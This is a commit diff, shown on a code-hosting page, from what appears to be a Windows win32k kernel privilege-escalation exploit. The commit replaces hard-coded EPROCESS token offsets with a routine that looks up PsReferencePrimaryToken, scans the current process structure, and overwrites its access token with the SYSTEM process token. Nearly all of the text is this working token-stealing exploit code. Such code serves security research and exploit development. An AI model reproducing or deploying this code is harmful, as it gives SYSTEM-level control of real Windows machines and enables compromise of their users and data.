Quick hack to remove hard-coded offsets
OJ
parent
a6467f49ec
commit
b291d41b76
Binary file not shown.
Binary file not shown.
|
|
@ -70,7 +70,13 @@ pUser32_ClientCopyImage g_originalCCI = NULL;
|
|||
PVOID g_ppCCI = NULL, g_w32theadinfo = NULL;
|
||||
int g_shellCalled = 0;
|
||||
DWORD g_OurPID;
|
||||
DWORD g_EPROCESS_TokenOffset = 0;
|
||||
|
||||
|
||||
typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
|
||||
_Inout_ PVOID Process
|
||||
);
|
||||
|
||||
lPsReferencePrimaryToken pPsReferencePrimaryToken = NULL;
|
||||
|
||||
typedef NTSTATUS (NTAPI *PRtlGetVersion)( _Inout_ PRTL_OSVERSIONINFOW lpVersionInformation );
|
||||
|
||||
|
|
@ -272,6 +278,9 @@ ULONG_PTR GetPsLookupProcessByProcessId(
|
|||
break;
|
||||
}
|
||||
|
||||
pPsReferencePrimaryToken = (lPsReferencePrimaryToken)GetProcAddress(MappedKernel, "PsReferencePrimaryToken");
|
||||
pPsReferencePrimaryToken = (lPsReferencePrimaryToken)((DWORD_PTR)KernelBase + ((DWORD_PTR)pPsReferencePrimaryToken - (DWORD_PTR)MappedKernel));
|
||||
|
||||
FuncAddress = (ULONG_PTR)GetProcAddress(MappedKernel, "PsLookupProcessByProcessId");
|
||||
FuncAddress = KernelBase + FuncAddress - (ULONG_PTR)MappedKernel;
|
||||
|
||||
|
|
@ -329,6 +338,36 @@ HWND GetFirstThreadHWND(
|
|||
return 0;
|
||||
}
|
||||
|
||||
// Search the specified data structure for a member with CurrentValue.
|
||||
BOOL find_and_replace_member(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize)
|
||||
{
|
||||
DWORD_PTR dwIndex, dwMask;
|
||||
|
||||
// Microsoft QWORD aligns object pointers, then uses the lower three
|
||||
// bits for quick reference counting.
|
||||
#ifdef _M_X64
|
||||
dwMask = ~0xf;
|
||||
#else
|
||||
dwMask = ~7;
|
||||
#endif
|
||||
// dwMask out the reference count.
|
||||
dwCurrentValue &= dwMask;
|
||||
|
||||
// Scan the structure for any occurrence of dwCurrentValue.
|
||||
for (dwIndex = 0; dwIndex < dwMaxSize; dwIndex++)
|
||||
{
|
||||
if ((pdwStructure[dwIndex] & dwMask) == dwCurrentValue)
|
||||
{
|
||||
// And finally, replace it with NewValue.
|
||||
pdwStructure[dwIndex] = dwNewValue;
|
||||
return TRUE;
|
||||
}
|
||||
}
|
||||
|
||||
// Member not found.
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
/*
|
||||
* StealProcessToken
|
||||
*
|
||||
|
|
@ -349,9 +388,14 @@ NTSTATUS NTAPI StealProcessToken(
|
|||
if (NT_SUCCESS(Status)) {
|
||||
Status = g_PsLookupProcessByProcessIdPtr((HANDLE)4, &SystemProcess);
|
||||
if (NT_SUCCESS(Status)) {
|
||||
if (g_EPROCESS_TokenOffset) {
|
||||
*(PVOID *)((PBYTE)CurrentProcess + g_EPROCESS_TokenOffset) = *(PVOID *)((PBYTE)SystemProcess + g_EPROCESS_TokenOffset);
|
||||
}
|
||||
PACCESS_TOKEN targetToken = pPsReferencePrimaryToken(CurrentProcess);
|
||||
PACCESS_TOKEN systemToken = pPsReferencePrimaryToken(SystemProcess);
|
||||
|
||||
// Find the token in the target process, and replace with the system token.
|
||||
find_and_replace_member((PDWORD_PTR)CurrentProcess,
|
||||
(DWORD_PTR)targetToken,
|
||||
(DWORD_PTR)systemToken,
|
||||
0x200);
|
||||
}
|
||||
}
|
||||
return Status;
|
||||
|
|
@ -436,13 +480,6 @@ void win32k_client_copy_image(LPVOID lpPayload)
|
|||
g_OurPID = GetCurrentProcessId();
|
||||
g_PsLookupProcessByProcessIdPtr = (PVOID)GetPsLookupProcessByProcessId();
|
||||
|
||||
#ifdef _WIN64
|
||||
g_EPROCESS_TokenOffset = 0x208;
|
||||
#else
|
||||
g_EPROCESS_TokenOffset = 0xF8;
|
||||
#endif
|
||||
|
||||
|
||||
if (g_PsLookupProcessByProcessIdPtr == NULL) {
|
||||
ExitProcess((UINT)-3);
|
||||
return;
|
||||
|
|
|
|||
Loading…
Reference in New Issue